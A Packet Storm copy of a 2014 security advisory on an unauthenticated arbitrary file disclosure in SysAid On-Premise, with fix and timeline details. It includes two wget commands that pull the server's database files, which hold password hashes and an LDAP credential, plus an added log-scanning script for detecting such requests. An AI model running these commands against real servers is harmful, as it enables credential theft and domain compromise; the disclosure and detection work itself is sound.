SysAid Server Arbitrary File Disclosure

2014-12-24T00:00:00
ID PACKETSTORM:129705
Type packetstorm
Reporter Bernhard Mueller
Modified 2014-12-24T00:00:00

Description

`Vantage Point Security Advisory 2014-004  
========================================  
  
Title: SysAid Server Arbitrary File Disclosure  
ID: VP-2014-004  
Vendor: SysAid  
Affected Product: SysAid On-Premise  
Affected Versions: < 14.4.2  
Product Website: http://www.sysaid.com/product/sysaid  
Author: Bernhard Mueller <bernhard[at]vantagepoint[dot]sg>  
  
  
Summary:  
---  
SysAid Server is vulnerable to an unauthenticated file disclosure  
attack that allows an anonymous attacker to read arbitrary files on  
the system. An attacker exploiting this issue can compromise SysAid  
user accounts and gain access to important system files. When SysAid  
is configured to use LDAP authentication it is possible to gain read  
access to the entire Active Directory or obtain domain admin  
privileges.  
  
Details:  
---  
  
How to download SysAid server database files containing usernames and  
password hashes (use any unauthenticated session ID):  
  
wget -O "ilient.mdf" --header="Cookie: JSESSIONID=1C712103AA8E9A3D3F1D834E0063A089" \
"http://sysaid.example.com/getRdsLogFile?fileName=c:\\\\Program+Files\\\\SysAidMsSQL\\\\MSSQL10_50.SYSAIDMSSQL\\\\MSSQL\\DATA\\\\ilient.mdf"

wget -O "ilient.ldf" --header="Cookie: JSESSIONID=1C712103AA8E9A3D3F1D834E0063A089" \
"http://sysaid.example.com/getRdsLogFile?fileName=c:\\\\Program+Files\\\\SysAidMsSQL\\\\MSSQL10_50.SYSAIDMSSQL\\\\MSSQL\\DATA\\\\ilient_log.LDF"
  
  
The downloaded MSSQL files contain the LDAP user account and encrypted  
password used to access the Active Directory (SysAid encrypts the  
password with a static key that is the same for all instances of the  
software).  
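
For reviewing web server access logs from before the upgrade, the following added example (not part of the original advisory and not SysAid code) flags requests to getRdsLogFile whose fileName parameter is an absolute path or contains traversal segments. The combined log format, the constructed sample lines and the premise that a legitimate request names a bare log file are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [20/Dec/2014:10:01:02 +0800] "GET /getRdsLogFile?fileName=c:%5CProgram+Files%5CSysAidMsSQL%5CMSSQL10_50.SYSAIDMSSQL%5CMSSQL%5CDATA%5Cilient.mdf HTTP/1.1" 200 52428800
203.0.113.7 - - [20/Dec/2014:10:03:40 +0800] "GET /getRdsLogFile?fileName=..%5C..%5Cexample.txt HTTP/1.1" 404 0
198.51.100.23 - - [20/Dec/2014:10:05:11 +0800] "GET /getRdsLogFile?fileName=session1.log HTTP/1.1" 200 1834
198.51.100.23 - - [20/Dec/2014:10:06:00 +0800] "GET /index.html HTTP/1.1" 200 9120
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)
DRIVE_RE = re.compile(r'^[A-Za-z]:')


def classify(name):
    """Return why a decoded fileName value is suspicious, or None (assumed benign)."""
    if DRIVE_RE.match(name) or name.startswith(("\\", "/")):
        return "absolute path"
    if ".." in re.split(r'[\\/]', name):
        return "path traversal"
    return None


def find_suspicious(log_text):
    """Return one finding per getRdsLogFile request with a suspicious fileName."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a parseable access-log line
        url = urlsplit(m["target"])
        if not url.path.lower().endswith("/getrdslogfile"):
            continue
        # parse_qs percent-decodes values and turns '+' into a space
        for key, values in parse_qs(url.query).items():
            for value in values if key.lower() == "filename" else []:
                reason = classify(value)
                if reason:
                    findings.append({"ip": m["ip"], "status": int(m["status"]),
                                     "size": m["size"], "file": value, "reason": reason})
    return findings


if __name__ == "__main__":
    for finding in find_suspicious(SAMPLE_LOG):
        print(finding)
```

A finding with status 200 and a large response size indicates the file was actually served; if the database files appear, treat the SysAid accounts and the LDAP service account stored there as exposed.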
  
  
Fix Information:  
---  
  
Upgrade to version 14.4.2.  
  
  
Timeline:  
---  
  
2014/11/14: Issue reported  
2014/12/22: Patch available and installed by client  
  
About Vantage Point Security:  
---  
  
Vantage Point Security is the leading provider for penetration testing  
and security advisory services in Singapore. Clients in the Financial,  
Banking and Telecommunications industries select Vantage Point  
Security based on technical competency and a proven track record to  
deliver significant and measurable improvements in their security  
posture.  
  
Web: https://www.vantagepoint.sg/  
Contact: office[at]vantagepoint[dot]sg  
`